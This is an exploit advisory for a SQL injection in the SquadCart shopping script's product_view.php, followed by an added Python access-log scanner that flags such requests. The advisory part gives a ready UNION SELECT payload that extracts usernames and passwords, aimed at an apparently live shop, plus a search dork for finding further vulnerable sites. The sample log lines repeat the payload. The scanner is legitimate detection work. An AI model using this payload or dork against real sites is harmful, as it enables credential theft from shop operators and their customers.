SquadCart SQL Injection Vuln


[o] SquadCart 7.0 and 5.1 SQL Injection Vulnerability

Software : SquadCart version 7.0 and 5.1
Vendor : http://thewebsquad.net/

Author : NoGe


[o] Vulnerable file
product_view.php


[o] Exploit
http://localhost/[path]/product_view.php?proid=[SQL]


[o] Proof Of Concept
http://shoveabitch.com/shove-a-bitch-t-shirts/SquadCart/product_view.php?prodid=326+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password),1,2,3+from+info_users--


[o] Dork
"Powered by acap" or inurl:squadcart


[o] Note
Private shop script again. -_-
If no result or error is shown, view the page source.
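
For anyone running an affected shop, requests shaped like the proof of concept stand out in the web server access log. The scanner below is an added example, not part of the original advisory or of SquadCart: it flags product_view.php requests whose prodid (or proid, as the exploit line spells it) is not a plain integer. The log lines are constructed, and it is an assumption that legitimate product ids are decimal integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate product ids are plain decimal integers.
NUMERIC_ID = re.compile(r"\d{1,10}")
# The advisory spells the parameter both ways, so watch both.
PARAMS = ("prodid", "proid")

def suspicious_requests(lines):
    """Return (line_no, param, decoded_value) for product_view.php hits
    whose product id parameter is not a plain integer."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        try:
            target = urlsplit(match.group(1))
        except ValueError:  # malformed request target, nothing to parse
            continue
        if not target.path.lower().endswith("/product_view.php"):
            continue
        # parse_qsl percent-decodes values and turns '+' into spaces.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key.lower() in PARAMS and not NUMERIC_ID.fullmatch(value):
                hits.append((line_no, key, value))
    return hits

# Constructed sample log lines (addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /SquadCart/product_view.php?prodid=326 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /SquadCart/product_view.php?prodid=326+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password),1,2,3+from+info_users-- HTTP/1.1" 200 4980',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /SquadCart/product_view.php?prodid=326%20and%201%3d1 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /SquadCart/index.php?prodid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line_no, key, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {key}={value!r}")
```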

